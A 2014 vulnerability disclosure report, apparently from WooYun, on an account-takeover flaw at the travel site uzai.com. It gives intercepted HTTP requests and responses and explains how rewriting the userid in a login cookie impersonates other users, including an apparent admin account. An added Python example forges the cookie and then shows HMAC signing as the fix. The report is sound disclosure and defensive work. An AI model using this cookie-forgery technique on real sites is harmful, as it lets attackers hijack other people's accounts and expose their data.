2014-05-30: Details reported to the vendor; awaiting vendor handling
2014-06-02: Vendor confirmed; details disclosed to the vendor only
2014-06-12: Details disclosed to core white hats and relevant domain experts
2014-06-22: Details disclosed to regular white hats
2014-07-02: Details disclosed to intern white hats
2014-07-14: Details disclosed to the public
See how I can log in to any of 悠哉旅游网 (uzai.com)'s 500,000+ user accounts at will
Details: a worked application of response tampering:
logging in to any of 悠哉旅游网's 500,000+ user accounts at will
First, some background: registering an account with a mobile number normally requires SMS verification of that number, but 悠哉旅游网 skips this step. Entering a mobile number registers it successfully with no verification at all (a design flaw).
So I simply registered the account (18688888888:wooyun).
When submitting the login I intercepted the traffic and captured the following POST request:
POST /reguser HTTP/1.1
Host: u.uzai.com
Proxy-Connection: keep-alive
Content-Length: 132
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://u.uzai.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://u.uzai.com/reguser
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: uzaiURLRefer=http%3A%2F%2Fwww.uzai.com%2F; uzaiNewURLRefer=http%3A%2F%2Fwww.uzai.com%2F; SERVERID=app32; uzwDangDiYou=1; history_cookie=76313_uh_%u3010%u516D%u6708%u3011%u97E9%u56FD%u9996%u5C14+%u6D4E%u5DDE%u6B22%u4E505%u65E5%u6E38%uFF08%u4E1C%u822A%uFF09_uh_3%u98DE%u4E0D%u8D70%u56DE%u5934%u8DEF%uFF0C%u97E9%u56FD%u7ECF%u5178%u666F%u70B9%uFF0C%u4E1C%u5927%u95E8+%u660E%u6D1E%u81EA%u7531%u8D2D%u5A31%u3002_uh_http://sh.uzai.com/tour-76313.html_uh_http://r.uzaicdn.com/pic/11043/m/w160/h120/t1_uh_3174_uh_2014/5/30 下午9:58:30; ASP.NET_SessionId=griefnhaholjs3qwi3zcuck3; __pztm_ref.4bd3852a51f48d59272566a168b43ea1=%5B1401459603689%2C%22http%3A%2F%2Fwww.uzai.com%2F%22%5D; __pztm_lp=null|http://www.uzai.com/; _ga=GA1.2.1414981402.1401458306; __pztm_cv=DGPCCBIC3GNG9EFG.1401458305956.1.1401461828933.1401458305956.1401458305956; __pztm_ses.4bd3852a51f48d59272566a168b43ea1=*; Hm_lvt_c6ca6ea4f6a82938e24232a7a3da3949=1401458306; Hm_lpvt_c6ca6ea4f6a82938e24232a7a3da3949=1401461829; Hm_lvt_a3dc6e4ea7fc10d1543395ebe6516d12=1401458306; Hm_lpvt_a3dc6e4ea7fc10d1543395ebe6516d12=1401461829
hidden_UpPageURL=http%3A%2F%2Fwww.uzai.com%2F&username=18688888888&password=wooyun&txtPassCode=&txtCardNum=&cooktime=1&keyUserCount=
Using Burp Suite's "Do intercept -> Response to this request" option,
forward the current request and receive the following response:
HTTP/1.1 302 Found
Cache-Control: public
Content-Type: text/html; charset=utf-8
Location: http://www.uzai.com/
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: user=userName=uzai503483&Email=&Mobile=18688888888&realname=&userid=503483&nickname=&headUrl=&islogin=1&userGrade=A; domain=uzai.com; expires=Fri, 06-Jun-2014 15:02:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 30 May 2014 15:02:48 GMT
Connection: close
Content-Length: 137
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.uzai.com/">here</a>.</h2>
</body></html>
Change the userid in the Set-Cookie header, forward the response, and you are instantly inside someone else's account. My own account is userid=503483, so there are 500,000+ users...
Going into userid=1 gives the user with username: uzaiadmin
This is probably a test account; all sorts of other sensitive information as well
I tested several other accounts too; I won't list them one by one, this is only to prove the impact
Programmers will understand
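The root cause is that the `user` cookie carries `userid` and `islogin=1` in plain form and the server believes whatever it receives, so the Burp edit above is all it takes. The following Python is an added example, not code from the report or from uzai.com: it parses the cookie format exactly as issued in the 302 response, reproduces the userid rewrite the report performs in Burp, models the trusting server-side lookup the behaviour implies, and shows the minimal hardening (an HMAC-SHA256 tag over the cookie fields, checked before any field is trusted). The server-side secret `SERVER_KEY`, the `sig` field name and all function names are assumptions for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qsl, urlencode

# Constructed sample input: the `user` cookie value exactly as issued in the
# 302 response shown in the report (userid 503483, islogin=1).
ISSUED_COOKIE = (
    "userName=uzai503483&Email=&Mobile=18688888888&realname=&userid=503483"
    "&nickname=&headUrl=&islogin=1&userGrade=A"
)

# Hypothetical server-side secret for the hardened variant; it never leaves the server.
SERVER_KEY = secrets.token_bytes(32)


def parse_user_cookie(value):
    """Split the '&'-joined key=value cookie into a dict, keeping empty fields."""
    return dict(parse_qsl(value, keep_blank_values=True))


def forge_cookie(value, **overrides):
    """The Burp step from the report: rewrite chosen fields in the Set-Cookie value."""
    fields = parse_user_cookie(value)
    fields.update({k: str(v) for k, v in overrides.items()})
    return urlencode(fields)


def vulnerable_current_user(cookie_value):
    """Server logic the report implies: trust islogin and userid straight from the cookie.

    Nothing binds the cookie to a server-side session, so whoever edits userid
    becomes that user. Returns the userid the server would act as, or None.
    """
    fields = parse_user_cookie(cookie_value)
    if fields.get("islogin") != "1":
        return None
    return int(fields["userid"])


def canonical_body(fields):
    """Deterministic serialization so issuer and verifier MAC the same bytes."""
    return urlencode(sorted(fields.items()))


def sign_cookie(fields, key=SERVER_KEY):
    """Hardened issue path: append an HMAC-SHA256 tag over the canonical fields."""
    body = canonical_body(fields)
    mac = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}&sig={mac}"


def hardened_current_user(cookie_value, key=SERVER_KEY):
    """Hardened read path: verify the tag before believing any field."""
    fields = parse_user_cookie(cookie_value)
    sig = fields.pop("sig", "")
    expected = hmac.new(key, canonical_body(fields).encode(), hashlib.sha256).hexdigest()
    # Constant-time compare; any edited, added or removed field changes the body.
    if not hmac.compare_digest(sig, expected):
        return None
    if fields.get("islogin") != "1":
        return None
    return int(fields["userid"])


if __name__ == "__main__":
    forged = forge_cookie(ISSUED_COOKIE, userid=1)
    print("vulnerable server, forged cookie ->", vulnerable_current_user(forged))
    signed = sign_cookie(parse_user_cookie(ISSUED_COOKIE))
    print("hardened server, genuine cookie ->", hardened_current_user(signed))
    print("hardened server, forged cookie  ->", hardened_current_user(forge_cookie(signed, userid=1)))
```

The signed variant is the smallest change that defeats the userid rewrite; it still leaves the identity in the client's hands, so a replayed cookie stays valid until `expires`. The better design is to issue only an opaque session identifier (the site already sets `ASP.NET_SessionId`) and keep `userid` in server-side session state, marking the cookie HttpOnly and Secure.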
Copyright notice: please credit the source when reposting: 魇@乌云
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2014-06-02 12:03
Vendor reply: Thanks, we will handle it promptly.
Latest status: none